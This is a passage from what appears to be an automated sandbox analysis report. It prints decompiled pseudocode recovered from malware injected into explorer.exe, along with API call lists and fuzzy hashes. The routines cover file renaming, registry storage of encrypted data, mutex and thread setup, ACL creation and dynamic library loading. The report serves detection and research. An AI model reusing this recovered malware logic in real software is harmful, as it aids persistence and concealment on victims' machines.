        					_t9 = E000C92E5(_t11 + 0x438);
        					_t59 = _t9;
        					_t63 = _t62 + 0x10;
        					_v544 = _t59;
        					if(_t59 != 0) {
        						while(1) {
        							_t35 =  *0xde688; // 0xf0000
        							_t56 = E000CA471(_t35 + 0x1878, 0x1388);
        							if(_t56 == 0) {
        								break;
        							}
        							if(E000CB269(_t59) == 0) {
        								_t32 = E000CF14F(_t59, 0x1388, _t74);
        							}
        							E000CA4DB(_t56);
        							_t41 =  *0xde684; // 0x64f8f0
        							 *((intOrPtr*)(_t41 + 0x30))(_t56);
        							if(_t32 > 0) {
        								E000C980C( &_v544);
        								_t43 =  *0xde778; // 0x64fc18
        								_t53 = 0x33;
        								if(E000C9ED0(_t43, _t53) != 0) {
        									L12:
        									__eflags = E000C1C68(_t59, __eflags, _t74);
        									if(__eflags >= 0) {
        										E000CB1B1(_t59, _t53, __eflags, _t74);
        										continue;
        									}
        								} else {
        									_t46 =  *0xde778; // 0x64fc18
        									_t53 = 0x12;
        									_t22 = E000C9ED0(_t46, _t53);
        									_t72 = _t22;
        									if(_t22 != 0 || E000CA4EF(_t53, _t72) != 0) {
        										_push(E000C980C(0));
        										E000C9640( &_v536, 0x104, L"%s.%u", _t59);
        										_t63 = _t63 + 0x14;
        										MoveFileW(_t59,  &_v536);
        										continue;
        									} else {
        										goto L12;
        									}
        								}
        							}
        							break;
        						}
        						_t9 = E000C861A( &_v544, 0xfffffffe);
        					}
        				}
        				return _t9;
        			}

























        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: FileMove
        • String ID: %s.%u
        • API String ID: 3562171763-1288070821
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 89%
        			E000C2AEA() {
        				intOrPtr _v8;
        				signed int _v12;
        				CHAR* _v16;
        				signed int _t16;
        				intOrPtr _t21;
        				intOrPtr _t22;
        				void* _t26;
        				void* _t29;
        				signed int _t31;
        				intOrPtr _t36;
        				CHAR* _t38;
        				intOrPtr _t39;
        				void* _t40;
        
        				_t15 =  *0xde710 * 0x64;
        				_t39 = 0;
        				_v12 =  *0xde710 * 0x64;
        				_t16 = E000C8604(_t15);
        				_t38 = _t16;
        				_v16 = _t38;
        				if(_t38 != 0) {
        					_t31 =  *0xde710; // 0x2
        					_t36 = 0;
        					_v8 = 0;
        					if(_t31 == 0) {
        						L9:
        						_push(_t38);
        						E000C9F48(0xe); // executed
        						E000C861A( &_v16, _t39);
        						return 0;
        					}
        					_t29 = 0;
        					do {
        						_t21 =  *0xde714; // 0x64fe88
        						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
        							if(_t39 != 0) {
        								lstrcatA(_t38, "|");
        								_t39 = _t39 + 1;
        							}
        							_t22 =  *0xde714; // 0x64fe88
        							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
        							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
        							_t26 = E000C9601( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
        							_t31 =  *0xde710; // 0x2
        							_t40 = _t40 + 0x18;
        							_t36 = _v8;
        							_t39 = _t39 + _t26;
        						}
        						_t36 = _t36 + 1;
        						_t29 = _t29 + 0x20;
        						_v8 = _t36;
        					} while (_t36 < _t31);
        					goto L9;
        				}
        				return _t16 | 0xffffffff;
        			}

















        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • lstrcatA.KERNEL32(00000000,000DB9A0,000C573E,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,000C573E), ref: 000C2B3D
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeaplstrcat
        • String ID: %u;%u;%u
        • API String ID: 3011335133-2973439046
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 59%
        			E000CBD10() {
        				char _v8;
        				void* _v12;
        				char _v16;
        				short _v20;
        				char _v24;
        				short _v28;
        				char _v32;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				intOrPtr _v44;
        				intOrPtr _v56;
        				intOrPtr _v60;
        				intOrPtr _v64;
        				intOrPtr _v68;
        				intOrPtr _v72;
        				intOrPtr _v76;
        				intOrPtr _v88;
        				intOrPtr _v92;
        				void _v96;
        				intOrPtr _t58;
        				intOrPtr _t61;
        				intOrPtr _t63;
        				intOrPtr _t65;
        				intOrPtr _t67;
        				intOrPtr _t70;
        				intOrPtr _t73;
        				intOrPtr _t77;
        				intOrPtr _t79;
        				intOrPtr _t81;
        				intOrPtr _t85;
        				intOrPtr _t87;
        				signed int _t90;
        				void* _t92;
        				intOrPtr _t93;
        				void* _t98;
        
        				_t90 = 8;
        				_v28 = 0xf00;
        				_v32 = 0;
        				_v24 = 0;
        				memset( &_v96, 0, _t90 << 2);
        				_v20 = 0x100;
        				_push( &_v12);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_push(0);
        				_v16 = 0;
        				_push(0);
        				_v8 = 0;
        				_push(1);
        				_v12 = 0;
        				_push( &_v24);
        				_t58 =  *0xde68c; // 0x64fab8
        				_t98 = 0;
        				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
        					L14:
        					if(_v8 != 0) {
        						_t67 =  *0xde68c; // 0x64fab8
        						 *((intOrPtr*)(_t67 + 0x10))(_v8);
        					}
        					if(_v12 != 0) {
        						_t65 =  *0xde68c; // 0x64fab8
        						 *((intOrPtr*)(_t65 + 0x10))(_v12);
        					}
        					if(_t98 != 0) {
        						_t63 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t63 + 0x34))(_t98);
        					}
        					if(_v16 != 0) {
        						_t61 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t61 + 0x34))(_v16);
        					}
        					L22:
        					return _t98;
        				}
        				_v68 = _v12;
        				_t70 =  *0xde688; // 0xf0000
        				_t92 = 2;
        				_v96 = 0x1fffff;
        				_v92 = 0;
        				_v88 = 3;
        				_v76 = 0;
        				_v72 = 5;
        				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
        					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
        						goto L7;
        					}
        					goto L4;
        				} else {
        					L4:
        					_push( &_v8);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(0);
        					_push(1);
        					_push(_t92);
        					_push(_t92);
        					_push( &_v32);
        					_t85 =  *0xde68c; // 0x64fab8
        					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
        						goto L14;
        					} else {
        						_t87 = _v8;
        						if(_t87 != 0) {
        							_push(2);
        							_pop(1);
        							_v64 = 0x1fffff;
        							_v60 = 1;
        							_v56 = 3;
        							_v44 = 0;
        							_v40 = 1;
        							_v36 = _t87;
        						}
        						L7:
        						_push( &_v16);
        						_push(0);
        						_push( &_v96);
        						_t73 =  *0xde68c; // 0x64fab8
        						_push(1); // executed
        						if( *((intOrPtr*)(_t73 + 8))() != 0) {
        							goto L14;
        						}
        						_t98 = LocalAlloc(0x40, 0x14);
        						if(_t98 == 0) {
        							goto L14;
        						}
        						_t93 =  *0xde68c; // 0x64fab8
        						_push(1);
        						_push(_t98);
        						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
        							goto L14;
        						}
        						_t77 =  *0xde68c; // 0x64fab8
        						_push(0);
        						_push(_v16);
        						_push(1);
        						_push(_t98);
        						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
        							goto L14;
        						}
        						if(_v8 != 0) {
        							_t81 =  *0xde68c; // 0x64fab8
        							 *((intOrPtr*)(_t81 + 0x10))(_v8);
        						}
        						_t79 =  *0xde68c; // 0x64fab8
        						 *((intOrPtr*)(_t79 + 0x10))(_v12);
        						goto L22;
        					}
        				}
        			}







































        APIs
        • SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 000CBDF7
        • LocalAlloc.KERNEL32(00000040,00000014), ref: 000CBE02
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocEntriesLocal
        • String ID:
        • API String ID: 2146116654-0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E000CA0AB(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
        				char* _v12;
        				char _v16;
        				int _v20;
        				signed int _v24;
        				intOrPtr _v28;
        				char* _v32;
        				char _v52;
        				char _v64;
        				char _v328;
        				char _v2832;
        				signed int _t48;
        				signed int _t49;
        				char* _t54;
        				long _t73;
        				long _t80;
        				long _t83;
        				intOrPtr _t84;
        				void* _t88;
        				char* _t89;
        				intOrPtr _t90;
        				void* _t103;
        				void* _t104;
        				char* _t106;
        				intOrPtr _t107;
        				char _t108;
        
        				_t48 = __ecx;
        				_t89 = __edx;
        				_v24 = __ecx;
        				if(_a4 == 0 || _a8 == 0) {
        					L13:
        					_t49 = _t48 | 0xffffffff;
        					__eflags = _t49;
        					return _t49;
        				} else {
        					_t115 = __edx;
        					if(__edx == 0) {
        						goto L13;
        					}
        					_t107 =  *((intOrPtr*)(__ecx + 0x108));
        					_push(_t107);
        					_t103 = 4;
        					_v12 = __edx;
        					_v28 = E000CD400( &_v12, _t103);
        					_t93 = _t107 + __edx;
        					E000D2301(_t107 + __edx,  &_v2832);
        					_t54 = E000D242D(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
        					_t108 = _a8;
        					_v12 = _t54;
        					_v20 = _t54 + 6 + _t108;
        					_t106 = E000C8604(_t54 + 6 + _t108);
        					_v32 = _t106;
        					if(_t106 != 0) {
        						 *_t106 = _a12;
        						_t16 =  &(_t106[6]); // 0x6
        						_t106[1] = 1;
        						_t106[2] = _t108;
        						E000C86E1(_t16, _a4, _t108);
        						_t21 = _t108 + 6; // 0x6
        						E000D22D3( &_v2832, _t21 + _t106, _v12);
        						_v16 = _t89;
        						_t90 = _v24;
        						_v12 =  *((intOrPtr*)(_t90 + 0x108));
        						_push( &_v52);
        						_t104 = 8;
        						E000CF490( &_v16, _t104);
        						E000CEAC1( &_v16,  &_v52, 0x14,  &_v328);
        						E000CEB2E(_t106, _v20,  &_v328);
        						_t73 = E000C9B0E(_t90);
        						_v12 = _t73;
        						__eflags = _t73;
        						if(_t73 != 0) {
        							E000C97A0(_v28,  &_v64, 0x10);
        							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
        							__eflags = _t80;
        							if(_t80 == 0) {
        								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
        								__eflags = _t83;
        								if(_t83 != 0) {
        									_push(0xfffffffc);
        									_pop(0);
        								}
        								_t84 =  *0xde68c; // 0x64fab8
        								 *((intOrPtr*)(_t84 + 0x1c))(_a4);
        							} else {
        								_push(0xfffffffd);
        								_pop(0);
        							}
        							E000C861A( &_v12, 0xffffffff);
        						}
        						E000C861A( &_v32, 0);
        						return 0;
        					}
        					_t88 = 0xfffffffe;
        					return _t88;
        				}
        			}





























        APIs
          • Part of subcall function 000D242D: _ftol2_sse.MSVCRT ref: 000D248E
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00000002,00000000), ref: 000CA1DE
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeapOpen_ftol2_sse
        • String ID:
        • API String ID: 3756893521-0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E000C98EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _t45;
        				intOrPtr _t46;
        				intOrPtr _t48;
        				intOrPtr _t49;
        				void* _t52;
        				intOrPtr _t53;
        				intOrPtr _t54;
        				struct _SECURITY_ATTRIBUTES* _t58;
        				intOrPtr _t59;
        				intOrPtr _t61;
        				intOrPtr _t65;
        				intOrPtr _t66;
        				intOrPtr _t67;
        				intOrPtr _t69;
        				struct _SECURITY_ATTRIBUTES* _t73;
        				intOrPtr _t74;
        				intOrPtr _t77;
        				intOrPtr _t78;
        				intOrPtr _t79;
        				intOrPtr _t82;
        				intOrPtr _t83;
        				void* _t86;
        				intOrPtr _t87;
        				intOrPtr _t89;
        				signed int _t92;
        				intOrPtr _t97;
        				intOrPtr _t98;
        				int _t106;
        				intOrPtr _t110;
        				signed int _t112;
        				signed int _t113;
        				void* _t115;
        
        				_push(__ecx);
        				_push(__ecx);
        				_v8 = __edx;
        				_v12 = __ecx;
        				_t77 =  *0xde76c; // 0x1d0
        				_t73 = 0;
        				if(E000CA4BF(_t77, 0x7530) >= 0) {
        					_t45 =  *0xde770; // 0x64aac0
        					_t112 = 0;
        					_t106 = 0;
        					do {
        						_t78 =  *((intOrPtr*)(_t106 + _t45));
        						if(_t78 == 0) {
        							L6:
        							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
        								_t113 = _t112 << 5;
        								if(_v8 == _t73) {
        									 *(_t113 + _t45 + 0x10) = _t73;
        									_t46 =  *0xde770; // 0x64aac0
        									 *(_t113 + _t46 + 0xc) = _t73;
        									L14:
        									_t79 =  *0xde770; // 0x64aac0
        									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
        									_t48 =  *0xde770; // 0x64aac0
        									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
        									_t49 = E000CA471(0, 1);
        									_t82 =  *0xde770; // 0x64aac0
        									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
        									_t83 =  *0xde770; // 0x64aac0
        									_t30 = _t83 + _t113 + 4; // 0x64aac4
        									_t52 = CreateThread(_t73, _t73, E000C98A6, _t83 + _t113, _t73, _t30);
        									_t53 =  *0xde770; // 0x64aac0
        									 *(_t113 + _t53) = _t52;
        									_t54 =  *0xde770; // 0x64aac0
        									_t86 =  *(_t113 + _t54);
        									if(_t86 != 0) {
        										SetThreadPriority(_t86, 0xffffffff);
        										_t87 =  *0xde770; // 0x64aac0
        										 *0xde774 =  *0xde774 + 1;
        										E000CA4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
        										_t74 =  *0xde770; // 0x64aac0
        										_t73 = _t74 + _t113;
        									} else {
        										_t59 =  *0xde684; // 0x64f8f0
        										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
        										_t61 =  *0xde770; // 0x64aac0
        										_t37 = _t61 + 0xc; // 0x64aacc
        										_t91 = _t37 + _t113;
        										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
        											E000C861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
        											_t61 =  *0xde770; // 0x64aac0
        										}
        										_t92 = 8;
        										memset(_t113 + _t61, 0, _t92 << 2);
        									}
        									L19:
        									_t89 =  *0xde76c; // 0x1d0
        									E000CA4DB(_t89);
        									_t58 = _t73;
        									L20:
        									return _t58;
        								}
        								_t110 = _a4;
        								_t65 = E000C8604(_t110);
        								_t97 =  *0xde770; // 0x64aac0
        								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
        								_t66 =  *0xde770; // 0x64aac0
        								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
        									goto L19;
        								}
        								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
        								_t67 =  *0xde770; // 0x64aac0
        								E000C86E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
        								_t115 = _t115 + 0xc;
        								goto L14;
        							}
        							goto L7;
        						}
        						_t69 =  *0xde684; // 0x64f8f0
        						_push(_t73);
        						_push(_t78);
        						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
        							_t45 =  *0xde770; // 0x64aac0
        							goto L7;
        						}
        						_t98 =  *0xde770; // 0x64aac0
        						E000C984A(_t106 + _t98, 0);
        						_t45 =  *0xde770; // 0x64aac0
        						goto L6;
        						L7:
        						_t106 = _t106 + 0x20;
        						_t112 = _t112 + 1;
        					} while (_t106 < 0x1000);
        					goto L19;
        				}
        				_t58 = 0;
        				goto L20;
        			}






































        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
        • Instruction ID: 3d3aa86b3fc97478f4b26c36f13bdb5f84f11f0de64e280aef22ffd0665b4c3f
        • Opcode Fuzzy Hash: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
        • Instruction Fuzzy Hash: 21517271615640DFD7A9FF28EC84D6AB7F9FB48314354892EE8468B361DB34E802CB60
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 27%
        			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
        				intOrPtr _v8;
        				char _v12;
        				intOrPtr _t26;
        				intOrPtr _t27;
        				intOrPtr _t29;
        				intOrPtr _t34;
        				intOrPtr* _t39;
        				void* _t47;
        				intOrPtr _t55;
        				intOrPtr _t58;
        				char _t60;
        
        				_push(__ecx);
        				_push(__ecx);
        				_t50 = _a4;
        				_t60 = 0;
        				_v12 = 0;
        				if(_a4 != 0) {
        					_t47 = E000CA63B(_t50);
        					if(_t47 == 0) {
        						L11:
        						_t26 = 0;
        						L12:
        						L13:
        						return _t26;
        					}
        					_t27 =  *0xde684; // 0x64f8f0
        					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
        					if(_t58 == 0) {
        						L9:
        						_t29 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t29 + 0x30))(_t47);
        						if(_t60 != 0) {
        							E000C861A( &_v12, 0);
        						}
        						goto L11;
        					}
        					_t4 = _t58 + 1; // 0x1
        					_t34 = E000C8604(_t4); // executed
        					_t60 = _t34;
        					_v12 = _t60;
        					if(_t60 == 0) {
        						goto L9;
        					}
        					_a4 = _a4 & 0;
        					_push(0);
        					_v8 = 0;
        					_push( &_a4);
        					_push(_t58);
        					_push(_t60);
        					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
        						if(_a4 == 0) {
        							if(_v8 != _t58) {
        								goto L9;
        							}
        							_t39 = _a8;
        							 *((char*)(_t58 + _t60)) = 0;
        							if(_t39 != 0) {
        								 *_t39 = _t58;
        							}
        							CloseHandle(_t47);
        							_t26 = _t60;
        							goto L12;
        						}
        						_t55 = _v8 + _a4;
        						_a4 = _a4 & 0x00000000;
        						_push(0);
        						_push( &_a4);
        						_v8 = _t55;
        						_push(_t58 - _t55);
        						_push(_t55 + _t60);
        					}
        					goto L9;
        				}
        				_t26 = 0;
        				goto L13;
        			}

        APIs
        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
        • CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,0064FD30,00000400), ref: 000CA776
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseFileHandleRead
        • String ID:
        • API String ID: 2331702139-0
        • Opcode ID: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
        • Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
        • Opcode Fuzzy Hash: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
        • Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 76%
        			E000C153B(void* __ecx, void* __edx) {
        				void* _v8;
        				void* _t3;
        				signed int _t4;
        				intOrPtr _t7;
        				signed int _t9;
        				intOrPtr _t10;
        				void* _t24;
        
        				_push(__ecx);
        				_t3 = CreateMutexA(0, 0, 0);
        				 *0xde6f4 = _t3;
        				if(_t3 == 0) {
        					L11:
        					_t4 = _t3 | 0xffffffff;
        					__eflags = _t4;
        				} else {
        					_t3 = CreateMutexA(0, 0, 0);
        					 *0xde6dc = _t3;
        					if(_t3 == 0) {
        						goto L11;
        					} else {
        						_t3 = E000C1080(0x4ac);
        						_v8 = _t3;
        						if(_t3 == 0) {
        							goto L11;
        						} else {
        							 *0xde6e8 = E000C91A6(_t3, 0);
        							E000C85C2( &_v8);
        							_t7 = E000C8604(0x100);
        							 *0xde6f0 = _t7;
        							if(_t7 != 0) {
        								 *0xde6fc = 0;
        								_t9 = E000C8604(0x401);
        								 *0xde6d4 = _t9;
        								__eflags = _t9;
        								if(_t9 != 0) {
        									__eflags =  *0xde6c0; // 0x0
        									if(__eflags == 0) {
        										E000D15B6(E000C8202, 0xc820b);
        									}
        									_push(0x61e);
        									_t24 = 8;
        									_t10 = E000CE1BC(0xdbd28, _t24); // executed
        									 *0xde6a0 = _t10;
        									_t4 = 0;
        								} else {
        									_push(0xfffffffc);
        									goto L5;
        								}
        							} else {
        								_push(0xfffffffe);
        								L5:
        								_pop(_t4);
        							}
        						}
        					}
        				}
        				return _t4;
        			}

        APIs
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C1545
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C155B
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateMutex$AllocateHeap
        • String ID:
        • API String ID: 704353917-0
        • Opcode ID: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
        • Instruction ID: 6e75c71e50a5731b0130a832f490ca52ea6bb9a9d023da2c25c43666a8ab9d4c
        • Opcode Fuzzy Hash: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
        • Instruction Fuzzy Hash: FD11B970605682AAF760AB75EC05FAE3BE4DBD27A0724422FE911C92D2EF74C4008738
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 47%
        			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
        				char _v8;
        				char _t5;
        				struct HINSTANCE__* _t7;
        				void* _t10;
        				void* _t12;
        				void* _t22;
        				void* _t25;
        
        				_push(__ecx);
        				_t12 = __ecx;
        				_t22 = __edx;
        				_t5 = E000C95C7(_a4);
        				_t25 = 0;
        				_v8 = _t5;
        				_push(_t5);
        				if(_a4 != 0x7c3) {
        					_t7 = LoadLibraryA(); // executed
        				} else {
        					_t7 = GetModuleHandleA();
        				}
        				if(_t7 != 0) {
        					_t10 = E000CE171(_t12, _t22, _t7); // executed
        					_t25 = _t10;
        				}
        				E000C85C2( &_v8);
        				return _t25;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
        • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID:
        • API String ID: 4133054770-0
        • Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
        • Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 65%
        			E000C2C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
        				WCHAR* _v8;
        				char _v12;
        				char _v44;
        				char _v564;
        				char _v1084;
        				void* __esi;
        				void* _t23;
        				struct _SECURITY_ATTRIBUTES* _t25;
        				int _t27;
        				char _t32;
        				char _t38;
        				intOrPtr _t39;
        				void* _t40;
        				WCHAR* _t41;
        				void* _t54;
        				char* _t60;
        				char* _t63;
        				void* _t70;
        				WCHAR* _t71;
        				intOrPtr* _t73;
        
        				_t70 = __ecx;
        				_push(__ecx);
        				E000CB700(__edx,  &_v44, __eflags, __fp0);
        				_t52 = _t70;
        				if(E000CBB8D(_t70) == 0) {
        					_t23 = E000C2BA4( &_v1084, _t70, 0x104); // executed
        					_pop(_t54);
        					__eflags = _t23;
        					if(__eflags == 0) {
        						_t71 = E000C2C64( &_v1084, __eflags);
        					} else {
        						E000CB012(_t54,  &_v564); // executed
        						_t32 = E000C109A(_t54, 0x375);
        						_push(0);
        						_v12 = _t32;
        						_push( &_v44);
        						_t60 = "\\";
        						_push(_t60);
        						_push(_t32);
        						_push(_t60);
        						_push( &_v564);
        						_push(_t60);
        						_t71 = E000C92E5( &_v1084);
        						E000C85D5( &_v12);
        					}
        				} else {
        					_t38 = E000C109A(_t52, 0x4e0);
        					 *_t73 = 0x104;
        					_v12 = _t38;
        					_t39 =  *0xde684; // 0x64f8f0
        					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
        					_t78 = _t40;
        					if(_t40 != 0) {
        						_t41 = E000C109A( &_v564, 0x375);
        						_push(0);
        						_v8 = _t41;
        						_push( &_v44);
        						_t63 = "\\";
        						_push(_t63);
        						_push(_t41);
        						_push(_t63);
        						_t71 = E000C92E5( &_v564);
        						E000C85D5( &_v8);
        					} else {
        						_t71 = E000C2C64( &_v44, _t78);
        					}
        					E000C85D5( &_v12);
        				}
        				_v8 = _t71;
        				_t25 = E000CB269(_t71);
        				if(_t25 == 0) {
        					_t27 = CreateDirectoryW(_t71, _t25); // executed
        					if(_t27 == 0 || E000CB269(_t71) == 0) {
        						E000C861A( &_v8, 0xfffffffe);
        						_t71 = _v8;
        					}
        				}
        				return _t71;
        			}

        APIs
        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000C2DA1
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateDirectory
        • String ID:
        • API String ID: 4241100979-0
        • Opcode ID: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
        • Instruction ID: edd7b77d9a22e79d699e63e24eebf5e62a2d4ad44de2fba8ddeb630291c3af95
        • Opcode Fuzzy Hash: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
        • Instruction Fuzzy Hash: E13192B1910214AADB24FBA48C96FEE73ACAB04310F14415EF906E7182EF749F408BB4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C5AFF(intOrPtr __edx, void* __fp0) {
        				short _v30;
        				short _v32;
        				short _v34;
        				short _v36;
        				intOrPtr* _t22;
        				intOrPtr _t23;
        				signed int _t30;
        				intOrPtr _t38;
        				intOrPtr* _t40;
        				intOrPtr _t44;
        				intOrPtr _t45;
        				intOrPtr* _t46;
        				signed int _t47;
        				void* _t55;
        
        				_t55 = __fp0;
        				_t45 = __edx;
        				_t47 = 0;
        				_t22 = E000C8604(0x14);
        				_t38 =  *0xde688; // 0xf0000
        				_t46 = _t22;
        				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
        					_v36 =  *((intOrPtr*)(_t38 + 0x228));
        					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
        					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
        					_v30 = 0;
        					GetDriveTypeW( &_v36); // executed
        				}
        				 *_t46 = 2;
        				 *(_t46 + 4) = _t47;
        				_t23 =  *0xde688; // 0xf0000
        				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
